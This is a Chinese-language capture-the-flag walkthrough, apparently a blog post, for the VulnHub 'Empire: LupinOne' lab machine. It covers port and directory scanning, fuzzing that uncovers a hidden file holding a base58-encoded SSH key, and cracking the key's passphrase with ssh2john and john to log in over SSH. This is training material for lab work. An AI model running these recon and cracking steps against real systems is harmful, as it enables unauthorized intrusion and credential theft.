一、部署靶机
靶机设置为nat模式
开启靶机 直接暴露靶机ip
二、信息收集
扫ip
访问靶机地址
扫目录
dirb http://192.168.146.155
dirsearch -u http://192.168.146.155
扫端口
nmap -sS -A -T4 192.168.146.155 //对靶机开放的端口进行更详细的扫描
nmap -sC -sV -p 22,80 192.168.146.155 -oN nmap.log //扫端口和目录
masscan -p 1-65535 192.168.146.155
指纹收集
whatweb -v 192.168.146.155
三、渗透攻击
访问robots.txt 发现文件夹~myfiles 但无法直接访问 要进行模糊测试
ffuf -c -w /usr/share/wordlists/dirb/co //太慢了!!!不要用了
wfuzz -u 'http://192.168.146.155/~FUZZ' -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 //秒出!!!
扫到一个 secret
解密
得到一封信重要的有:1.存在隐藏文件 2.用fasttrack字典爆破密码 3.用户名icex64
ffuf -u 'http://192.168.47.133/~secret/.FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub,.html,.bak -mc 200
直接去访问一下这个文件mysecret.txt
去解密一下
base64解密不出来;base58可以;这就是登录系统的私钥
创建两个文档;2.txt写我们解密后的数据;1.txt空的
我们可以利用kali自带的ssh2john进行密码的暴力破解
把我们解密后的数据写到1.txt
ssh2john 2.txt > 1.txt
john --wordlist=/usr/share/wordlists/fasttrack.txt 1.txt
得到密码P@55w0rd!
用户名:icex64
密码:P@55w0rd!
登录系统
#如果出现报错//报错的原因是Linux和Windows的换行符不一致
chmod 600 key #提升权限
dos2unix key #改变格式
#在连接
ssh icex64@192.168.47.133 -i key
成功获取flag
标签:192.168,解密,LupinOne,vulnhub,146.155,Empire,txt,靶机,usr From: https://blog.csdn.net/qq_54694921/article/details/144777636